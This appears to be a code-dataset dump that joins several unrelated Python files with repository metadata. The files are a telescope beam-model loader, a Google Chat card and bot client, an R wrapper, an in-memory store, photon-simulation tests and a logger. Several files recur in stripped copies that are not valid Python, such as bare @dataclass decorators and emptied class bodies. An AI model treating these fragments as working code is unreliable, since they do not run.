            teldat_path = self.telbndmdl2dirfile(tel, '', '')[0]
            tbfiles = glob.glob(teldat_path+'*_*.teldat.p')
            bands = []
            antmodels = []
            for tbfile in tbfiles:
                filename = os.path.basename(tbfile)
                # NOTE(review): assumes exactly one '_' in the file name —
                # a band or model containing '_' would break this split.
                (band, modelsuffix) = filename.split('_')
                bands.append(band)
                antmodel = modelsuffix.split('.', 2)[0]
                antmodels.append(antmodel)
            self.tbdata[tel] = {}
            for band in bands:
                self.tbdata[tel][band] = {}
                for antmodel in antmodels:
                    self.tbdata[tel][band][antmodel] = {}
        # Find the station list for every telescope/band/beam-model triple.
        for tel in self.tbdata.keys():
            for band in self.tbdata[tel].keys():
                for beammodel in list(self.tbdata[tel][band].keys()):
                    telbnddata = self.getTelescopeBand(tel, band, beammodel)
                    # Bug fix: the original assigned to the stale loop
                    # variable `antmodel`, so only one model got its stations.
                    self.tbdata[tel][band][beammodel] = telbnddata['Station'].keys()

    def get_telescopes(self):
        """Return the available telescope names."""
        return self.tbdata.keys()

    def get_bands(self, telescope):
        """Return the bands available for *telescope*."""
        return self.tbdata[telescope].keys()

    def get_stations(self, telescope, band):
        """Return the station names for *telescope*/*band*.

        Bug fix: ``dict.keys()[0]`` raises TypeError in Python 3 (key views
        are not subscriptable); pick an arbitrary beam model via
        ``next(iter(...))`` instead. Stations are the same for all models.
        """
        abeammodel = next(iter(self.tbdata[telescope][band]))
        return self.tbdata[telescope][band][abeammodel]

    def get_beammodels(self, telescope, band):
        """Return the beam-model names for *telescope*/*band*."""
        return self.tbdata[telescope][band].keys()

    def getTelescopeBand(self, tscopename, band, beammodel):
        """Unpickle and return the teldat structure for the given triple."""
        tbdata_dir, tbdata_fname = self.telbndmdl2dirfile(tscopename, band, beammodel)
        tbdata_path = tbdata_dir+tbdata_fname
        with open(tbdata_path, 'rb') as f:
            telbnddata = pickle.load(f)
        return telbnddata

    def telbndmdl2dirfile(self, tscopename, band, beammodel):
        """Map a (tscopename, band, beammodel) tuple to (directory, filename).

        directory is ``<telescopes_dir>/<tscopename>/data/`` and filename is
        ``<band>_<beammodel>.teldat.p``.
        """
        metadata_dir = "data/"  # subdir within telescope dir with telbnd metadata
        tbdata_fname = band+"_"+beammodel+".teldat.p"
        tbdata_dir = self.telescopes_dir+"/"+tscopename+"/"+metadata_dir
        return tbdata_dir, tbdata_fname
| 2,191 | 0 | 177 |
d6e621b3be8e3fb18373df6cf7bc97c51fa5816f | 8,883 | py | Python | gcp_pilot/chats.py | guilacerda/gcp-pilot | b31a7d4cd2de94a57c928c024e8f5b074f628224 | [
"Apache-2.0"
] | null | null | null | gcp_pilot/chats.py | guilacerda/gcp-pilot | b31a7d4cd2de94a57c928c024e8f5b074f628224 | [
"Apache-2.0"
] | 16 | 2021-01-11T00:59:42.000Z | 2022-03-29T18:34:55.000Z | gcp_pilot/chats.py | guilacerda/gcp-pilot | b31a7d4cd2de94a57c928c024e8f5b074f628224 | [
"Apache-2.0"
] | 1 | 2021-09-17T05:38:41.000Z | 2021-09-17T05:38:41.000Z | import json
from dataclasses import field, dataclass
from typing import List, Dict, Generator
import requests
from gcp_pilot import exceptions
from gcp_pilot.base import GoogleCloudPilotAPI, DiscoveryMixin, ResourceType
# NOTE(review): the two bare @dataclass decorators below have lost the class
# bodies they decorated (this chunk appears truncated/filtered); as written
# this is not valid Python — the decorated class definitions presumably lived
# here. TODO restore from the original module.
@dataclass
@dataclass
# Public API of this module.
__all__ = (
    "Text",
    "Section",
    "Card",
    "ChatsBot",
    "ChatsHook",
)
| 27.165138 | 110 | 0.573117 | import json
from dataclasses import field, dataclass
from typing import List, Dict, Generator
import requests
from gcp_pilot import exceptions
from gcp_pilot.base import GoogleCloudPilotAPI, DiscoveryMixin, ResourceType
class Text:
    """Helpers for Google Chat text markup: mentions, links and colors."""
    @classmethod
    def build_mention(cls, member_id: str = "all") -> str:
        """Return a mention tag for *member_id* (defaults to @all)."""
        return "<users/{}>".format(member_id)
    @classmethod
    def build_link(cls, url: str, text: str) -> str:
        """Return a clickable link that displays *text*."""
        return "<{}|{}>".format(url, text)
    @classmethod
    def format_color(cls, hex_color: str, text: str) -> str:
        """Wrap *text* in a font tag colored with the given hex code."""
        return '<font color="#{}">{}</font>'.format(hex_color, text)
class Widget(dict):
    """Base chat widget: a plain dict plus an optional wrapping key."""
    _key = None
    def as_data(self):
        """Serialize to a dict; wrap it under ``_key`` when one is set."""
        payload = dict(self)
        return {self._key: payload} if self._key else payload
class ButtonWidget(Widget):
    """A clickable button: text-, image-URL-, or icon-based."""
    def __init__(self, url, text: str = None, image_url: str = None, icon: str = None):
        super().__init__()
        # The first non-empty of text/image_url/icon selects the flavor.
        if text:
            wrap_key, data_field, value = "textButton", "text", text
        elif image_url:
            wrap_key, data_field, value = "imageButton", "iconUrl", image_url
        elif icon:
            wrap_key, data_field, value = "imageButton", "icon", icon
        else:
            raise exceptions.UnsupportedFormatException("A button must have a text, image or icon")
        self._key = wrap_key
        self[data_field] = value
        # Clicking the button opens the given URL.
        self["onClick"] = {"openLink": {"url": url}}
class ButtonGroupWidget(Widget):
    """A group of buttons serialized as a list under the "buttons" key."""
    _key = "buttons"
    def __init__(self, buttons):
        super().__init__(buttons=buttons)
    def as_data(self):
        """Serialize each contained button and wrap the list under ``_key``."""
        serialized = [button.as_data() for button in self["buttons"]]
        return {self._key: serialized}
class OnClickWidget(Widget):
    """An onClick action that opens a URL."""
    _key = "onClick"
    def __init__(self, url):
        super().__init__(openLink={"url": url})
class KeyValueWidget(Widget):
    """A keyValue widget: main content plus optional labels and decorations."""
    _key = "keyValue"
    def __init__(
        self,
        content: str,
        top: str = None,
        bottom: str = None,
        break_lines: bool = True,
        on_click: OnClickWidget = None,
        icon: str = None,
        button: ButtonWidget = None,
    ):
        payload = {
            "content": content,
            "contentMultiline": "true" if break_lines else "false",
        }
        # Optional fields are serialized only when truthy.
        for field_name, value in (
            ("topLabel", top),
            ("bottomLabel", bottom),
            ("onClick", on_click),
            ("icon", icon),
            ("button", button),
        ):
            if value:
                payload[field_name] = value
        super().__init__(payload)
class TextWidget(Widget):
    """A plain paragraph of text."""
    _key = "textParagraph"
    def __init__(self, text: str):
        payload = {"text": text}
        super().__init__(payload)
class ImageWidget(Widget):
    """An image, optionally clickable."""
    _key = "image"
    def __init__(self, image_url: str, on_click: OnClickWidget = None):
        payload = {"imageUrl": image_url}
        if on_click:
            # Merge the onClick mapping into this widget's own data.
            payload.update(on_click.as_data())
        super().__init__(payload)
@dataclass
class Section:
    """One card section: an optional header plus an ordered list of widgets."""
    header: str = None
    widgets: List[Widget] = field(default_factory=list)

    def add_header(self, text: str):
        """Set this section's header text."""
        self.header = text

    def add_text(
        self,
        content: str,
        title: str = "",
        footer: str = "",
        click_url: str = None,
        icon: str = None,
        button: str = None,
    ):
        """Append a keyValue widget with the given content and decorations."""
        click = OnClickWidget(url=click_url) if click_url else None
        self.widgets.append(
            KeyValueWidget(
                content=content,
                top=title,
                bottom=footer,
                break_lines=True,
                on_click=click,
                icon=icon,
                button=button,
            )
        )

    def add_paragraph(self, text: str):
        """Append a plain text paragraph."""
        self.widgets.append(TextWidget(text=text))

    def add_button(self, url, text: str = None, image_url: str = None, icon: str = None, append: bool = True):
        """Append a button.

        When *append* is true and the last widget is a button group, the new
        button joins that group; otherwise a new group is started.
        """
        new_button = ButtonWidget(url=url, text=text, image_url=image_url, icon=icon)
        if append and self.widgets and "buttons" in self.widgets[-1]:
            self.widgets[-1]["buttons"].append(new_button)
            return
        self.widgets.append(ButtonGroupWidget(buttons=[new_button]))

    def add_image(self, image_url: str, click_url: str = None):
        """Append an image, optionally clickable."""
        click = OnClickWidget(url=click_url) if click_url else None
        self.widgets.append(ImageWidget(image_url=image_url, on_click=click))

    def as_data(self):
        """Serialize the section (header included only when set)."""
        data = {"widgets": [widget.as_data() for widget in self.widgets]}
        if self.header:
            data["header"] = self.header
        return data

    def __bool__(self):
        # A section counts as "real" once it has a header or any widget.
        if self.header is not None:
            return True
        return len(self.widgets) > 0
@dataclass
class Card:
    """A chat card: an optional header widget plus a list of sections."""
    header: Widget = None
    sections: List[Section] = field(default_factory=list)

    def add_header(self, title: str, subtitle: str = "", image_url: str = None, style: str = "IMAGE"):
        """Set the card header widget."""
        self.header = Widget(
            title=title,
            subtitle=subtitle,
            imageUrl=image_url,
            imageStyle=style,
        )

    def add_section(self, section: Section):
        """Append *section*, skipping sections that are empty (falsy)."""
        if section:
            self.sections.append(section)

    def as_data(self) -> Dict:
        """Serialize the card for the Chat API."""
        data = {"sections": [section.as_data() for section in self.sections]}
        if self.header:
            data["header"] = self.header.as_data()
        return data
class ChatsHook:
    """Posts messages to a Google Chat incoming-webhook URL."""
    def __init__(self, hook_url: str):
        self.hook_url = hook_url

    def _post(self, body: Dict, thread_key: str = None) -> Dict:
        """POST *body* as JSON to the hook, optionally into a thread."""
        if thread_key:
            target_url = f"{self.hook_url}&threadKey={thread_key}"
        else:
            target_url = self.hook_url
        response = requests.post(
            url=target_url,
            headers={"Content-Type": "application/json; charset=UTF-8"},
            data=json.dumps(body),
        )
        response.raise_for_status()
        return response.json()

    def send_text(self, text: str, thread_key: str = None) -> Dict:
        """Send a plain-text message."""
        return self._post(body={"text": text}, thread_key=thread_key)

    def send_card(self, card: Card, additional_text: str = None, thread_key: str = None) -> Dict:
        """Send a card message, optionally with accompanying plain text."""
        payload = {"cards": [card.as_data()]}
        if additional_text:
            payload["text"] = additional_text
        return self._post(body=payload, thread_key=thread_key)
class ChatsBot(DiscoveryMixin, GoogleCloudPilotAPI):
    """Google Chat bot client built on the Discovery "chat" v1 service."""
    # OAuth scope required for bot operations.
    _scopes = ["https://www.googleapis.com/auth/chat.bot"]
    def __init__(self, **kwargs):
        """Initialize the underlying Discovery client for chat v1."""
        super().__init__(
            serviceName="chat",
            version="v1",
            cache_discovery=False,
            **kwargs,
        )
    def _room_path(self, room_id: str) -> str:
        """Return *room_id* prefixed with "spaces/" (idempotent)."""
        prefix = "spaces/"
        if not room_id.startswith(prefix):
            room_path = f"{prefix}{room_id}"
        else:
            room_path = room_id
        return room_path
    def _member_path(self, room_id: str, member_id: str) -> str:
        """Return the "spaces/<room>/members/<member>" path (idempotent)."""
        room_path = self._room_path(room_id=room_id)
        prefix = "members/"
        if not member_id.startswith(prefix):
            member_path = f"{prefix}{member_id}"
        else:
            member_path = member_id
        return f"{room_path}/{member_path}"
    def get_room(self, room_id: str) -> ResourceType:
        """Fetch a single space/room."""
        return self._execute(
            method=self.client.spaces().get,
            name=self._room_path(room_id=room_id),
        )
    def get_rooms(self) -> Generator[ResourceType, None, None]:
        """Yield all spaces/rooms visible to the bot (paginated)."""
        yield from self._paginate(
            method=self.client.spaces().list,
            result_key="spaces",
        )
    def get_member(self, room_id: str, member_id: str) -> ResourceType:
        """Fetch a single membership of a room."""
        name = self._member_path(room_id=room_id, member_id=member_id)
        return self._execute(
            method=self.client.spaces().members().get,
            name=name,
        )
    def get_members(self, room_id: str) -> Generator[ResourceType, None, None]:
        """Yield all memberships of a room (paginated)."""
        yield from self._paginate(
            method=self.client.spaces().members().list,
            result_key="memberships",
            params={"parent": self._room_path(room_id=room_id)},
        )
    def send_text(self, room_id: str, text: str) -> ResourceType:
        """Post a plain-text message into a room."""
        body = {"text": text}
        return self._execute(
            method=self.client.spaces().messages().create,
            parent=self._room_path(room_id=room_id),
            body=body,
        )
    def send_card(self, room_id: str, card: Card, additional_text: str = None) -> ResourceType:
        """Post a card message into a room, optionally with extra text."""
        body = {
            "cards": [card.as_data()],
        }
        if additional_text:
            body["text"] = additional_text
        return self._execute(
            method=self.client.spaces().messages().create,
            parent=self._room_path(room_id=room_id),
            body=body,
        )
# Public names exported by this module.
__all__ = (
    "Text",
    "Section",
    "Card",
    "ChatsBot",
    "ChatsHook",
)
| 6,911 | 1,219 | 407 |
e0e76690facb84505835744d64bbf96b88b0f025 | 1,013 | py | Python | econsa/tests/wrapper_r.py | MargaritaRad/econsa | 12d494067efacc6c2a893dc229bfac2dfce2074b | [
"MIT"
] | 3 | 2020-07-17T15:05:52.000Z | 2020-10-23T06:21:13.000Z | econsa/tests/wrapper_r.py | MargaritaRad/econsa | 12d494067efacc6c2a893dc229bfac2dfce2074b | [
"MIT"
] | 65 | 2020-05-14T13:36:12.000Z | 2021-06-22T15:45:15.000Z | econsa/tests/wrapper_r.py | MargaritaRad/econsa | 12d494067efacc6c2a893dc229bfac2dfce2074b | [
"MIT"
] | 4 | 2020-07-15T13:51:52.000Z | 2021-08-31T06:58:33.000Z | """Wrapping R.
This module contains all functionality related to the use of functions from R for testing purposes.
"""
import numpy as np
import rpy2.robjects.packages as rpackages
from rpy2 import robjects
from rpy2.robjects import numpy2ri
r_package_cond_mvnorm = rpackages.importr("condMVNorm")
def r_cond_mvn(mean, cov, dependent_ind, given_ind, given_value):
"""The original function for `cond_mvn`."""
numpy2ri.activate()
r_mean = robjects.FloatVector(mean)
n = cov.shape[0]
r_cov = robjects.r.matrix(cov, n, n)
r_dependent_ind = robjects.IntVector([x + 1 for x in dependent_ind])
r_given_ind = robjects.IntVector([x + 1 for x in given_ind])
r_given_value = robjects.FloatVector(given_value)
args = (r_mean, r_cov, r_dependent_ind, r_given_ind, r_given_value)
r_cond_mean, r_cond_cov = r_package_cond_mvnorm.condMVN(*args)
r_cond_mean, r_cond_cov = np.array(r_cond_mean), np.array(r_cond_cov)
numpy2ri.deactivate()
return r_cond_mean, r_cond_cov
| 31.65625 | 99 | 0.745311 | """Wrapping R.
This module contains all functionality related to the use of functions from R for testing purposes.
"""
import numpy as np
import rpy2.robjects.packages as rpackages
from rpy2 import robjects
from rpy2.robjects import numpy2ri
r_package_cond_mvnorm = rpackages.importr("condMVNorm")
def r_cond_mvn(mean, cov, dependent_ind, given_ind, given_value):
"""The original function for `cond_mvn`."""
numpy2ri.activate()
r_mean = robjects.FloatVector(mean)
n = cov.shape[0]
r_cov = robjects.r.matrix(cov, n, n)
r_dependent_ind = robjects.IntVector([x + 1 for x in dependent_ind])
r_given_ind = robjects.IntVector([x + 1 for x in given_ind])
r_given_value = robjects.FloatVector(given_value)
args = (r_mean, r_cov, r_dependent_ind, r_given_ind, r_given_value)
r_cond_mean, r_cond_cov = r_package_cond_mvnorm.condMVN(*args)
r_cond_mean, r_cond_cov = np.array(r_cond_mean), np.array(r_cond_cov)
numpy2ri.deactivate()
return r_cond_mean, r_cond_cov
| 0 | 0 | 0 |
c5b851f4b324c30f3518d4ceac9a33ec3c88fe3c | 2,277 | py | Python | izi/store.py | izi-global/izir | d1a4bfb5c082c3de1956402ef0280564014a3bd8 | [
"MIT"
] | null | null | null | izi/store.py | izi-global/izir | d1a4bfb5c082c3de1956402ef0280564014a3bd8 | [
"MIT"
] | 5 | 2021-03-18T21:01:05.000Z | 2022-03-11T23:29:48.000Z | izi/store.py | izi-global/izir | d1a4bfb5c082c3de1956402ef0280564014a3bd8 | [
"MIT"
] | null | null | null | """izi/store.py.
A collecton of native stores which can be used with, among others, the session middleware.
Copyright (C) 2018 DiepDT-IZIGlobal
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from izi.exceptions import StoreKeyNotFound
class InMemoryStore:
    """
    Naive store class which can be used for the session middleware and unit tests.

    It is not thread-safe and no data will survive the lifecycle of the izi process.

    Regard this as a blueprint for more useful and probably more complex store implementations, for example stores
    which make use of databases like Redis, PostgreSQL or others.
    """
    def __init__(self):
        """Create an empty store.

        Bug fix: this version never initialized ``self._data``, so every
        method raised AttributeError on first use.
        """
        self._data = {}

    def get(self, key):
        """Get data for given store key. Raise izi.exceptions.StoreKeyNotFound if key does not exist."""
        try:
            data = self._data[key]
        except KeyError:
            raise StoreKeyNotFound(key)
        return data

    def exists(self, key):
        """Return whether key exists or not."""
        return key in self._data

    def set(self, key, data):
        """Set data object for given store key."""
        self._data[key] = data

    def delete(self, key):
        """Delete data for given store key (no-op when absent)."""
        if key in self._data:
            del self._data[key]
| 41.4 | 114 | 0.721124 | """izi/store.py.
A collecton of native stores which can be used with, among others, the session middleware.
Copyright (C) 2018 DiepDT-IZIGlobal
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from izi.exceptions import StoreKeyNotFound
class InMemoryStore:
    """
    Naive in-process store usable for the session middleware and unit tests.

    Not thread-safe; contents vanish with the izi process. Treat it as a
    blueprint for richer store implementations (e.g. backed by Redis or
    PostgreSQL).
    """
    def __init__(self):
        # Backing mapping: store key -> stored object.
        self._data = {}

    def get(self, key):
        """Get data for given store key. Raise izi.exceptions.StoreKeyNotFound if key does not exist."""
        if key not in self._data:
            raise StoreKeyNotFound(key)
        return self._data[key]

    def exists(self, key):
        """Return whether key exists or not."""
        return key in self._data

    def set(self, key, data):
        """Set data object for given store key."""
        self._data[key] = data

    def delete(self, key):
        """Delete data for given store key (no-op when absent)."""
        self._data.pop(key, None)
| 22 | 0 | 26 |
bd041f5740993491e2644cba5876f694e23dc1d4 | 5,722 | py | Python | tests/test_photons.py | ruicamposcolabpt/MontyCarlo | 8f9e7af78f010f44fda81a4ab064e32421a205f9 | [
"MIT"
] | null | null | null | tests/test_photons.py | ruicamposcolabpt/MontyCarlo | 8f9e7af78f010f44fda81a4ab064e32421a205f9 | [
"MIT"
] | null | null | null | tests/test_photons.py | ruicamposcolabpt/MontyCarlo | 8f9e7af78f010f44fda81a4ab064e32421a205f9 | [
"MIT"
] | null | null | null | __doc__ = """Unit-testing the `.tools` package.
"""
__author__ = "Rui Campos"
import _cmd
import sys
del sys.argv[1]
import numpy as np
import unittest as ut
# Importing
from MontyCarlo.types import PySTATE
from MontyCarlo.particles.photons import python_hooks
Photon = python_hooks.Photon
class input_val:
    """Marker namespace for values fed into the code under test."""


class ground_truth:
    """Marker namespace for reference (expected) values."""


class output_val:
    """Marker namespace for values computed by the code under test."""
class test_Photon(ut.TestCase):
    """Unit testing photons.
    """
    # A basic set-up for holding one particle -----------------------
    # NOTE: this setup executes at class-definition (import) time, not in
    # setUp()/setUpClass(); it builds one shared Photon in a water sphere.
    print("SETTING UP")
    from MontyCarlo.geometry.CSG import Sphere
    from MontyCarlo.geometry.CSG import InfiniteVolume
    from MontyCarlo.materials.materials import Mat
    from MontyCarlo._init import eax
    print("Creating photon...")
    photon = Photon()
    print("Creating water...")
    # Water: H2O as {Z: count} with density 1.
    water = Mat({1:2, 8:1}, 1)
    print("Creating geometry...")
    with InfiniteVolume() as OUTER:
        OUTER.fill(water)
        OUTER.configure("no_name", render = False)
    with Sphere(1) as sphere:
        # NOTE(review): a bare `sphere in OUTER` expression — presumably the
        # CSG `__contains__` registers containment as a side effect; verify.
        sphere in OUTER
        sphere.fill(water)
        sphere.configure("no_name", render = False)
    print("Setting current region...")
    photon.current_region = sphere
    print("UPDATING")
    photon.update_references()
    photon.update_imfp()
    print("DONE. STARTING TESTS")
    # ----------------------------------------------------------------
    def test_updates(self):
        """Checks for segmentation errors when calling update methods.
        """
        print("\n\nTESTING UPDATES")
        cls = test_Photon
        cls.photon.update_references()
        cls.photon.update_imfp()
if __name__ == '__main__':
    ut.main()
| 26.86385 | 87 | 0.534254 | __doc__ = """Unit-testing the `.tools` package.
"""
__author__ = "Rui Campos"
import _cmd
import sys
del sys.argv[1]
import numpy as np
import unittest as ut
# Importing
from MontyCarlo.types import PySTATE
from MontyCarlo.particles.photons import python_hooks
Photon = python_hooks.Photon
# Marker namespaces used to label values in the tests below.
class input_val:
    """A namespace indicating input values.
    """
    pass
class ground_truth:
    """A namespace indicating groundtruth.
    """
    pass
class output_val:
    """A namespace indicating calculated values.
    """
    pass
class test_Photon(ut.TestCase):
    """Unit testing photons.

    The class body performs a one-off scene set-up at class-creation time:
    a water-filled unit sphere nested in an infinite water volume, with a
    single ``Photon`` placed inside.  All test methods reuse the shared
    particle through the class attribute ``test_Photon.photon``.
    """
    # A basic set-up for holding one particle -----------------------
    print("SETTING UP")
    from MontyCarlo.geometry.CSG import Sphere
    from MontyCarlo.geometry.CSG import InfiniteVolume
    from MontyCarlo.materials.materials import Mat
    from MontyCarlo._init import eax
    print("Creating photon...")
    photon = Photon()
    print("Creating water...")
    # Water: two parts hydrogen (Z=1), one part oxygen (Z=8), density 1.
    water = Mat({1:2, 8:1}, 1)
    print("Creating geometry...")
    with InfiniteVolume() as OUTER:
        OUTER.fill(water)
        OUTER.configure("no_name", render = False)
    with Sphere(1) as sphere:
        # NOTE(review): this bare `in` expression discards its result —
        # presumably the CSG `__contains__` registers the nesting as a
        # side effect; confirm against the geometry API.
        sphere in OUTER
        sphere.fill(water)
        sphere.configure("no_name", render = False)
    print("Setting current region...")
    photon.current_region = sphere
    print("UPDATING")
    photon.update_references()
    photon.update_imfp()
    print("DONE. STARTING TESTS")
    # ----------------------------------------------------------------
    def test_updates(self):
        """Checks for segmentation errors when calling update methods.
        """
        print("\n\nTESTING UPDATES")
        cls = test_Photon
        cls.photon.update_references()
        cls.photon.update_imfp()
    def test_find_index(self):
        """Check that `find_index` locates the energy-grid interval holding E."""
        print("\n\n TESTING `find_index`")
        cls = test_Photon
        import numpy.random as npr
        photon = cls.photon
        eax = cls.eax
        N = len(eax) - 1
        points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9, ]
        # Test many random energies inside each consecutive pair of points.
        for E0, Ef in zip(points[:-1], points[1:]):
            print(f"Testing `find_index` in range [{E0}, {Ef}]")
            for i in range(50_000):
                E = E0 + npr.rand()*(Ef - E0)
                photon.E = E
                # NOTE(review): rebinding `i` shadows the loop counter;
                # harmless here, but a distinct name would be clearer.
                i = photon.find_index()
                error_msg = f"""
                INVALID INDEX
                --------------
                photon.find_index() failed for E = {E} eV.
                It found index i = {i}. Which is out of range for the array `eax`.
                """
                self.assertTrue(0 <= i <= N, msg = error_msg)
                error_msg = f"""
                FOUND WRONG INDEX
                -----------------
                photon.find_index() failed for E = {E}eV.
                It found index i = {i}. Corresponding to the following interval:
                {eax[i]} <= {E} < {eax[i+1]}
                Note: eax[i] <= E < eax[i+1]
                """
                self.assertTrue( eax[i] <= E < eax[i+1], msg = error_msg)
                #print(f"SUCCESS: {eax[i]} <= {E} < {eax[i+1]}")
    def test_compton(self):
        """Smoke-test `_incoherent` (Compton scattering) over a range of energies."""
        print("\n\nTESTING INCOHERENT")
        from collections import deque
        cls = test_Photon
        photon = cls.photon
        print("Seeding photon:")
        photon.set_seed(1234)
        points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
        for E in points:
            print(f"Running `_incoherent` for energy {E}eV")
            # k is the photon energy in electron rest-mass units (m_e c^2 = 0.511 MeV).
            photon.k = E/0.5110e6
            photon.E = E
            photon.secondary = deque()
            photon._incoherent()
    def test_coherent(self):
        """Smoke-test `_coherent` (Rayleigh scattering); it must conserve energy."""
        print("\n\nTESTING COHERENT")
        cls = test_Photon
        photon = cls.photon
        print("Seeding photon:")
        photon.set_seed(1234)
        points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
        for E in points:
            print(f"Running `_coherent` for energy {E}eV")
            k = E/0.5110e6
            photon.k = E/0.5110e6
            photon._coherent()
            self.assertEqual(photon.k, k, msg = "Coherent is not conserving energy...")
    def test_photoelectric(self):
        """Smoke-test `_photoelectric` over a range of energies."""
        print("\n\nTESTING photoelectric")
        cls = test_Photon
        photon = cls.photon
        print("Seeding photon:")
        photon.set_seed(1234)
        points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
        for E in points:
            print(f"Running `_photoelectric` for energy {E}eV")
            k = E/0.5110e6
            photon.k = E/0.5110e6
            photon._photoelectric()
    def test_pairproduction(self):
        """Smoke-test `_pairproduction` over a range of energies."""
        print("\n\nTESTING `_pairproduction`")
        cls = test_Photon
        photon = cls.photon
        print("Seeding photon:")
        photon.set_seed(1234)
        points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
        for E in points:
            print(f"Running `_pairproduction` for energy {E}eV")
            k = E/0.5110e6
            photon.k = E/0.5110e6
            photon._pairproduction()
    def test_tripletproduction(self):
        """Smoke-test `_tripletproduction` over a range of energies."""
        print("\n\nTESTING tripletproduction")
        cls = test_Photon
        photon = cls.photon
        print("Seeding photon:")
        photon.set_seed(1234)
        points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
        for E in points:
            print(f"Running `_tripletproduction` for energy {E}eV")
            k = E/0.5110e6
            photon.k = E/0.5110e6
            photon._tripletproduction()
if __name__ == '__main__':
    # Run the test suite when this module is executed directly.
    ut.main()
| 3,654 | 0 | 174 |
ebc91893855d6f9b007c8a257640ae53da0985e3 | 5,108 | py | Python | iglesia/logger.py | ratt-ru/radiopadre-client | ef138860d22523bf08a847317f3daca363db65a3 | [
"MIT"
] | 1 | 2020-04-06T03:40:24.000Z | 2020-04-06T03:40:24.000Z | iglesia/logger.py | ratt-ru/radiopadre-client | ef138860d22523bf08a847317f3daca363db65a3 | [
"MIT"
] | 29 | 2020-01-24T09:47:37.000Z | 2022-03-02T18:00:46.000Z | iglesia/logger.py | ratt-ru/radiopadre-client | ef138860d22523bf08a847317f3daca363db65a3 | [
"MIT"
] | null | null | null | import sys, os.path, logging, time, atexit, glob
# Module-level logging state; populated by init()/enable_logfile().
logger = None
# Destination of the session log; stderr until a log file is opened.
logfile = sys.stderr
logfile_handler = None
# Number of per-type log files kept on disk.
NUM_RECENT_LOGS = 5
try:
    PipeError = BrokenPipeError
except NameError: # for py2
    PipeError = IOError
class TimestampFilter(logging.Filter):
    """Adds a timestamp attribute to the LogRecord, if enabled"""
    # Reference time for elapsed-seconds stamps, fixed at import.
    time0 = time.time()
    # Global toggle for timestamp annotation.
    enable = False
class ColorizingFormatter(logging.Formatter):
    """This Formatter inserts color codes into the string according to severity"""
    # NOTE(review): in this (filtered) copy the class body — its format()
    # override — has been stripped; the full definition appears below.
# The {<{< ... >}>} markers delimit the span ColorizingFormatter colorizes.
_default_format = "%(name)s%(timestamp)s: {<{<%(severity)s%(message)s>}>}"
_default_format_boring = "%(name)s%(timestamp)s: %(severity)s%(message)s"
_boring_formatter = logging.Formatter(_default_format_boring)
_colorful_formatter = ColorizingFormatter(_default_format)
# NOTE(review): MultiplexingHandler is not defined above in this chunk —
# this copy appears to be a filtered duplicate of the full module below.
_default_console_handler = MultiplexingHandler()
| 34.513514 | 119 | 0.658771 | import sys, os.path, logging, time, atexit, glob
# Module-level logging state; populated by init()/enable_logfile().
logger = None
# Destination of the session log; stderr until enable_logfile() opens a file.
logfile = sys.stderr
logfile_handler = None
# Number of per-type log files kept on disk by enable_logfile().
NUM_RECENT_LOGS = 5
try:
    PipeError = BrokenPipeError
except NameError: # for py2
    PipeError = IOError
class TimestampFilter(logging.Filter):
    """Logging filter that annotates each record with two extra attributes.

    ``record.timestamp`` — elapsed seconds since import, e.g. ``" [1.23s]"``,
    or an empty string while the class-level ``enable`` toggle is off.
    ``record.severity`` — ``"LEVEL: "`` for everything except INFO, which
    gets an empty prefix.  Always lets the record through.
    """
    # Reference instant for the elapsed-time stamp, fixed at import.
    time0 = time.time()
    # Global switch; flipped by enable_timestamps().
    enable = False
    def filter(self, record):
        elapsed = time.time() - self.time0
        record.timestamp = " [{:.2f}s]".format(elapsed) if self.enable else ""
        if record.levelno == logging.INFO:
            record.severity = ""
        else:
            record.severity = "{}: ".format(logging.getLevelName(record.levelno))
        return True
class MultiplexingHandler(logging.Handler):
    """Console handler that routes records to one of two streams by severity.

    Records above INFO go to ``err_stream`` (stderr by default), everything
    else to ``info_stream`` (stdout), as long as ``self.multiplex`` is True;
    with multiplexing off, everything goes to the info stream.  Broken-pipe
    errors during flushing are swallowed, since they routinely occur while
    the interpreter is shutting down.
    """
